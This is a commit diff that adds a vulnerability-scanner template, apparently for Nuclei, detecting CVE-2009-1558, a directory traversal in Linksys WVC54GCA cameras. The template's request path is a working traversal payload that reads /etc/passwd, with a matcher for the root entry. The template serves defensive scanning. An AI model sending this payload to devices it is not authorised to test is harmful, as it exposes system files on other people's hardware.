Create CVE-2009-1558.yaml
parent
28a0197945
commit
141993dafd
|
@ -0,0 +1,23 @@
|
||||||
|
id: CVE-2009-1558
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
reference: https://www.exploit-db.com/exploits/32954
|
||||||
|
tags: cve,cve2009,iot,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue